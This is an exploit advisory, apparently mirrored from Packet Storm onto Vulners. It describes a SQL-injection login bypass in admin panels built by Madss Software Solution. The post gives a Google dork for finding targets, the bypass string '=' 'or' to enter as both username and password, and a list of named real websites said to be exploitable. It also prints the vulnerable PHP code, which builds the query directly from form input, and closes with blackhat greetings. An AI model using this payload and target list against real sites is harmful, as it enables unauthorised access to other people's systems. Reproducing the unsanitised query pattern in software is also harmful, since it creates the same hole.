Vulners
Lucene search
Madss Software Solution SQL Injection
🗓️ 13 Apr 2014 00:00:00Reported by Ashiyane Digital Security TeamType 
packetstorm🔗 packetstormsecurity.com👁 44 Views
`#########################################
# Exploit Title : Developed by Madss Software Solution Login page Bypass Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://madsssoftwaresolution.com
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Developed by Madss Software Solution Pvt. Ltd."
#
# Date: 2014/4/13
#
###########################################
#
# Exploit : Login page bypass
#
# Location : [Target]/admin/login.php
#
# Username : '=' 'or'
#
# Password : '=' 'or'
######################
# Proof:
#
# http://www.artistmahendradubey.com/admin/login.php
#
# http://www.sardarenterprises.com/admin/login.php
#
# http://www.amritaorganic.com/admin/login.php
#
# http://www.kvmcpandhana.com/admin/login.php
#
# http://www.vikatsoft.com/admin/login.php
#
# http://www.narulamathsmagic.com/admin/login.php
#
# http://www.dayodayathirthborgaon.com/admin/login.php
#
# http://www.chhatimata.com/admin/login.php
#
# http://www.chhatimata.com/admin/login.php
#
# http://www.mnlawcollegekhandwa.com/admin/login.php
#
# http://www.guptashrikhandwa.com/admin/login.php
#
# http://www.apnagwalior.com/admin/login.php
#
# http://www.apnamorena.com/admin/login.php
#
# http://www.djpsbhikangaon.com/admin/login.php
#
# http://www.acmecoachingbhikangaon.com/admin/login.php
#
# http://www.sainisportsacademy.com/admin/login.php
#
# http://www.apnaburhanpur.com/admin/login.php
#
############################################
Vulnerable Code
<?php
session_start();
error_reporting(0);
include("config.php");
/*if(isset($_SESSION["session_nickname"]) && $_SESSION["session_nickname"]!="")
{
header("location:admin_home.php");
}*/
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Admin Login</title>
<link href="css/login.css" rel="stylesheet" type="text/css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head>
<body>
<br />
<a href="../xlexcicalx.php" style="margin-left:850px; color:#F00">Logout completelly</a>
<div id="logincontainer">
<h1>Administrator</h1>
<div id="loginbox">
<?php
if(isset($_POST['submit']))
{
$sql=mysql_query("select * from tbl_admin where username='".$_POST['username']."' and password='".$_POST['password']."' and type='admin'") or die(mysql_error());
if(mysql_num_rows($sql)>0)
{
$_SESSION["session_nickname"]=$_POST['username'];
$_SESSION["type"]='admin';
?>
<script type="text/javascript"> window.location.href="admin_home.php";</script>
<?php
}
else
{
$mass="Invalid user name or password. ";
}
?>
<tr>
<td colspan="3" align="center"><strong style="color:#FF0000"><?php echo $mass; ?></strong></td>
</tr>
<?php
}
?>
<form method="post" />
<div class="inputcontainer">
<img src="./images/icons/icon_username.png" alt="Username" />
<label for="username">Username:</label>
<input type="text" id="username" name="username" />
</div>
<div class="inputcontainer">
<img src="./images/icons/icon_locked.png" alt="Password" />
<label for="password">Password:</label>
<input type="password" id="password" name="password" />
</div>
<input type="submit" name="submit" value="Login" class="loginsubmit" />
<p><a href="forget_password.php">Forgotten password</a></p>
</form>
</div>
</div>
</body>
</html>
###################################################
Milad Hacking
We Love Mohammad
Home Page : https://www.facebook.com/milad.hacking.5
Email: milad.hacking.blackhat[at]gmail.com
Parcham balast
############################################
Special Tnx To
My Love , Iliya Norton , Unfix Blackhat , HashoR , Unline , mahdi.safavi , h00man_empire
Bahman Spy , Far Yar , Parsix , Matthew Farrell , ALi Sec , Ali Svr , Hossein Ghayoumi Zadeh , Shahram BlackHat , Saeed Nouri Massal , Hamid Reza Ashrafnia , LinX64 , Hossein Hezami , Raminramz ,Ali Reza , Saeed.0511 , Spoofer ( best Friend ) , Dr4GOn ,Alireza666 , Amirh03in , Rezahck23 , EB051 , AbolfazlKHAAN , Hacker.Ramin , b0z0rgmehr , badguy , Nc 521 , Alireza Attacker , HAMIDx9 , GNU Linux , BlackhatGH , Angel--D3m0n , B14ckc0d3r , Milad-Bushehr , F.I.G.H.T.E.R , SHD.N3T , SaiedSoft , Cyb3r_Inj3ct0r , SolD!3r , ACC3SS , Wanted2011 , CyberHacker , Hasan Speed , iman teymouri , Ba3bak , spoof , T3rm!nat0r5 , D3s!6n37 , @_HOJ@T_@ , 4rm4n , Th mAnger , FaridP30 , AMoK , Azad , The-Smith , soheil-hidd3n , blackvirus73 ,ERroR , HASSAN20 , Majidflash , R33VES , Rz04 , stealer , Dr.James , m@rte2a , Mast3r 0mid , MMA Defacer , MR.Moein , Mr.PERSIA , Red line
############################################
Never Forget My Top Friends <3
############################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Apr 2014 00:00Current
0.4Low risk
Vulners AI Score0.4